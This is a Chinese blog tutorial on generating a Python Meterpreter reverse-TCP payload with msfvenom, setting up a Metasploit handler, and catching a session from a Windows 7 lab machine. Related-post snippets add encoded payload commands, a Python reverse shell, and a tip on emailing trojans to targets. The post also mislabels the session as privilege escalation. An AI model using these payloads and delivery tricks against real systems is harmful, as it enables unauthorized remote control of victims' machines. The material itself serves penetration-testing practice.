MSF渗透测试之msfvenom提权之python

已于 2023-01-20 10:49:32 修改
阅读量3.4k 收藏 4
点赞数 2
分类专栏: MFS渗透测试 文章标签: 测试工具 运维开发
于 2022-04-05 21:23:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/123976993
版权
本文介绍了如何使用msfvenom生成python payload进行渗透测试中的提权操作。首先,通过msfvenom命令生成python脚本,然后在Kali Linux上执行该脚本并配置multi/handler模块,设置payload、LHOST和LPORT。在Windows终端执行python脚本后,可在Kali中获得meterpreter会话,完成提权。
摘要由CSDN通过智能技术生成

MSF渗透测试之msfvenom提权之python

python生成payload进行提权

文章目录

前言

一、msfvenom是什么?

msfvenom是MSF靶机中的一个后渗透提权工具

二、使用步骤

1.先生成python脚本

代码如下(示例):
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.222.131 lport=5447 -f raw -o pythonshell.py

在这里插入图片描述

(2)然后在kali桌面生成一个python文件,编译打开进行复制
在这里插入图片描述
(3)打开msf,使用攻击模块
use exploit/multi/handler
(4)设置payload
set payload python/meterpreter/reverse_tcp
(5)options查看设置信息
(6)设置端口和主机
set lhost 192.168.222.131
set lport 5447
在这里插入图片描述
(7)run后打开win7终端。

2.终端执行python脚本

在这里插入图片描述
成功后回到kali提权成功
在这里插入图片描述进入到meterperter界面,提权成功。

总结

本次实验是对msfvenom提权的Python进一次渗透。进一步对msfvenom的熟练掌握。

炫彩@之星
关注
专栏目录
MSF多种渗透测试实例合集
weixin_45380284的博客
03-05 3673
MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏
渗透工具——kali中msf(后门生成模块msfvenom
最新发布
2301_78006725的博客
09-02 839
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
msfvenom常用payload
ITgougou_的博客
12-24 459
payload命令 windows: msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac: msfvenom-...
python 生成payload_msfvenom生成各类Payload命令
weixin_39895181的博客
02-09 198
BinariesLinuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exeMacmsfvenom -p osx/x...
python调用msf_MSF利用python反弹shell-Bypass AV
weixin_39883079的博客
11-30 1673
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...
python扩展到msf
gao646467783的博客
06-01 610
msf框架提供了python的接口,并且网上有好多以Python写的渗透测试代码,尤其是exploit-da等漏洞库中,可不可以把网上的python代码稍稍改动一下放到msf中使用呢(假如根据同一套的逻辑重写一个的话,不仅要对ruby有一些理解,而且要费事的重写)?
python 反弹shell
wz200210的专栏
07-06 1629
client: nc -l 8080 server: import socket,subprocess,os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("127.0.0.1",8080))  os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) 
msf 渗透测试
06-05
### Metasploit渗透测试知识点详解 #### 一、Metasploit框架概述 Metasploit是一款功能强大的渗透测试框架,主要用于安全审计与渗透测试工作。它提供了丰富的模块支持,包括漏洞利用、后渗透攻击等,可以帮助安全...
Python黑帽子:黑客与渗透测试编程之道》 Windows系统提权
weixin_30763397的博客
05-28 223
环境准备: pywin32的安装在第八章的键盘记录中有,这里还需要安装wmi: 在本人的32位win7上本来是没有easy_install这个命令的,这需要安装setuptools-0.6c11.win32-py2.7.exe即可 http://www.sobaidupan.com/file-3739339.html 接着下载安装bhpservice.zip:https://www.n...
python脚本实现Redis未授权批量提权
09-09
主要给大家介绍了关于利用python脚本实现redis未授权批量提权的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
python-libmsf:用于Metasploit Web服务的Python
04-17
python-libmsf 描述 libmsf是用于Metasploit Web服务的python库。 使用libmsf,您可以使用Metasploit对象,例如: libmsf易于使用: >>> from libmsf.msf import Msf >>> from libmsf.rest import MsfRestApi >>> msf_rest_api = MsfRestApi(api_key= ' cf2dbb7f9d1f92839a84f9c165ee9afef3dd3a3116bc99badf45be4ae5655168c9c2c3c58621b460 ' , api_url= ' https://localhost:5443 ' ) >>> workspace: Msf.Workspace = Msf.Workspace(name= ' test_workspace '
python调用msf_从python poc到metasploit模块
weixin_39521651的博客
11-30 796
metasploit5从metasploit开始引入了第三方模块,也就是说可以使用python来编写模块。并且可以加入主分支。得到最新版本由于kail等渗透系统并不是使用github上的最新版本,版本还在4.x。所以我们需要在github上下载git clone https://github.com/rapid7/metasploit-framework/将原来的msf配置文件复制到下载下来的文件...
Python 实现Windows系统提权
CSDN
05-28 5816
WMI(Windows Management Instrumentation)是Windows操作系统中的管理框架,它提供了一种标准化的方式来管理和监控计算机系统的各种资源和服务。WMI可以通过编程接口(如COM接口)进行访问,并允许开发人员和系统管理员对计算机系统进行远程管理和监控。
利用python特性进行提权
cnbird's blog
02-22 2371
http://huaidan.org/archives/2810.html
python提权_渗透利器 | 提权辅助工具箱
weixin_34002071的博客
01-29 1271
作为技术宅的我,日常最大的爱好就是逛论坛。某日看到论坛里有一款基于主机的漏洞扫描工具,用来查找主机上公开EXP的CVE。嗯嗯,我想还是叫提权辅助工具可能会更顺口一些。在我印象中,类似的工具其实还蛮多的,比如我们熟知的Linux_Exploit_Suggester和Windows-Exploit-Suggester。我花了一点时间,整理了 9 款提权辅助工具,不敢独享,特整理成文。如果你对提权有那么...
python pip提权
weixin_39219503的博客
12-21 1465
在有些linux机器中,某个用户拥有pip的sudo权限,在这种情况下,可以利用pip install进行本地提权。 在执行pip install时会调用setup.py,可以在本地创建恶意setup.py文件来达到任意命令执行的效果。 from setuptools import setup from setuptools.command.install import install impor...
利用python3进行提权
weixin_47156475的博客
08-13 1450
提权的话,发现不能使用sudo提权,但是可以使用python进行提权
远程调用python_Python 远程调用MetaSploit
weixin_39882317的博客
11-29 121
(1)安装Python的msgpack类库。MSF官方文档中的数据序列化标准就是參照msgpack。root@kali:~# apt-get install python-setuptoolsroot@kali:~# easy_install msgpack-python(2)创建createdb_sql.txt:create database msf;create user msf with p...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值